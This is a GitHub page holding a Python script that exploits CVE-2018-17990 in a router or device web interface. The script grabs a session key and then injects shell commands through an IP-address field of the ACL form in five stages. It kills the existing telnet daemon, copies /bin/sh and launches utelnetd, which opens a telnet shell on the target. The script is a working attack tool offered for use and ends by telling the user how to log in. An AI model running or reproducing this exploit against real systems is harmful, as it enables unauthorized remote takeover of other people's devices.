-
Notifications
You must be signed in to change notification settings - Fork 3
/
cve-2018-17990.py
67 lines (59 loc) · 2.44 KB
/
cve-2018-17990.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
import requests
import time
import sys
# Proxy for debug purpose
proxies = {'http': '//127.0.0.1:8080', 'https': 'https:127.0.0.1:8080'}
# Help string
help = 'Please insert two argument: <Target> and <Port>\nExample: $python cve-2018-17990.py 192.168.0.1 80'
welcome = 'Welcome in cve-2018-17990 exploit script!\nPlease BE SURE OF WHAT YOU ARE DOING!\nHappy Hacking\n'
def make_request(target, port, payload, count):
# Request to obtain a valid session key
url = "http://{}:{}/cgi-bin/get/New_GUI/get_sessionKey.asp?_=1538429663612".format(target, port)
headers = {"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-GB,en-US;q=0.9,en;q=0.8,it;q=0.7",
"Connection": "close"
}
try:
r = requests.get(url, headers=headers)
except:
print '[-] Target not reachable, Exiting...'
exit(1)
# Request to inject the payload
url = "http://{}:{}/cgi-bin/New_GUI/Acl.asp".format(target, port)
data = {"sessionKey": r.text.strip(), "buttonType": '', "ACLActionFlag": "0",
"ActivateRDOValue": "Yes",
"RuleActiveRDOValue": "Yes",
"ActivateRDO_ck": "on",
"RuleIndexSEL": "0",
"RuleActiveRDO_ck": "on",
"ScrIPaddrBeginTXT": "1.1.1.1",
"ScrIPaddrEndTXT": "1.1.1.{}{}".format(count, payload),
"ApplicationSEL": "Web",
"InterfaceSEL": "Both"
}
try:
requests.post(url, headers=headers, data=data)#, proxies=proxies)
except:
print '[-] Target not reachable, Exiting...'
exit(1)
time.sleep(1)
if __name__=='__main__':
# Takes as input a target and a port
try:
target = sys.argv[1]
port = sys.argv[2]
print welcome
except:
print help
exit(1)
# Exploit stages in correct order
payloads = [';ps|grep tel>a;', ';grep -v gr a>b;', ';kill $(cat b);', ';cp /bin/sh .;', ';utelnetd -dl sh;']
count = 1
for payload in payloads:
print '[*] Injecting Payload Stage: {}/5'.format(count)
make_request(target, port, payload, count)
count += 1
print '[+] Exploitation finished, now it is possible to access the device by:\n$ telnet {}'.format(target)